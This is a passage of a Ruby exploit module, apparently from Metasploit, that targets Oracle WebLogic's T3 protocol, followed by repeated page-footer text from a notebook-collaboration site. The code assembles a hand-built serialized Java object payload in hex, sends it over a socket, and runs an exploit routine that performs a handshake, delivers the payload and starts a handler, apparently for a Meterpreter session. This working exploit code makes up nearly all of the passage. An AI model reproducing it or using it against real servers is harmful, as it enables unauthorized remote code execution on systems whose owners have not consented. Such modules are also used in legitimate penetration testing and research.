    # basic weblogic ImmutableServiceContext object (serialized)
597
    payload << 'aced0005'                                  # JSO v5 header
598
    payload << '73'                                        # object header
599
    payload << '72'                                        #   class
600
    payload << '00257765626c6f6769632e726a766d2e496d6d75'  #   Name: weblogic.rjvm.ImmutableServiceContext
601
    payload << '7461626c6553657276696365436f6e74657874'    #     (cont)
602
    payload << 'ddcba8706386f0ba'                          #   serialVersionUID
603
    payload << '0c'                                        #   EXTERNALIZABLE | BLOCKDATA
604
    payload << '0000'                                      #   fieldCount = 0
605
    payload << '78'                                        #   object footer
606
    payload << '72'                                        # block header
607

608

609
    payload << '00297765626c6f6769632e726d692e70726f76'    #   Name: weblogic.rmi.provider.BasicServiceContext
610
    payload << '696465722e426173696353657276696365436f'    #     (cont)
611
    payload << '6e74657874'                                #     (cont)
612
    payload << 'e4632236c5d4a71e'                          #   serialVersionUID
613
    payload << '0c'                                        #     EXTERNALIZABLE | BLOCKDATA
614
    payload << '0000'                                      #   fieldCount = 0
615
    payload << '7870'                                      #   block footer
616
    payload << '77'                                        # block header
617
    payload << '020600'                                    #   contents = 0x0600
618
    payload << '7372'                                      #   class descriptor
619
    payload << '00267765626c6f6769632e726d692e696e7465'    #     Name: weblogic.rmi.internal.MethodDescriptor
620
    payload << '726e616c2e4d6574686f644465736372697074'    #       (cont)
621
    payload << '6f72'                                      #       (cont)
622
    payload << '12485a828af7f67b'                          #     serialVersionUID
623
    payload << '0c'                                        #     EXTERNALIZABLE | BLOCKDATA
624
    payload << '0000'                                      #     fieldCount = 0
625
    payload << '7870'                                      #     class footer
626
    payload << '77'                                        #   class data
627

628
    #payload << '34002e61757468656e746963617465284c7765'    #     old contents = 0x002e61757468656e746963617465284c7765
629
    #payload << '626c6f6769632e73656375726974792e61636c'    #                    626c6f6769632e73656375726974792e61636c
630
    #payload << '2e55736572496e666f3b290000001b'            #                    2e55736572496e666f3b290000001b
631
    payload << rand_text_alphanumeric(52).unpack('H*')[0]  #   new = randomized
632
    payload << '78'                                        #     class footer
633
    payload << '78'                                        #   block footer
634
                                                           # MISSING OBJECT FOOTER (0x78)
635

636
    payload << 'fe00ff'                                    # this cruft again.  some kind of footer
637

638
    # sets the length of the stream
639
    data = ((payload.length >> 1) + 4).to_s(16).rjust(8,'0')
640
    data << payload
641

642
    sleep(2)
643
    sock.put([data].pack('H*'))
644
    sleep(2)
645
    sock.get_once
646
  end
647

648
  def exploit
649
    @met_sent = []
650
    gen_resp
651

652
    connect
653

654
    print_status('Sending handshake...')
655
    t3_handshake
656

657
    print_status('Sending T3 request object...')
658
    build_t3_request_object
659

660
    start_service
661

662
    print_status('Sending client object payload...')
663
    send_payload_objdata
664

665
    handler
666

667
    disconnect
668
  end
669
end
670

671
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
